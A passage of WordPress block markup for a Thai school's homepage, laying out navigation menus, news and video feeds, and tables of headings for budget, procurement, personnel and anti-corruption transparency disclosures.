{\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 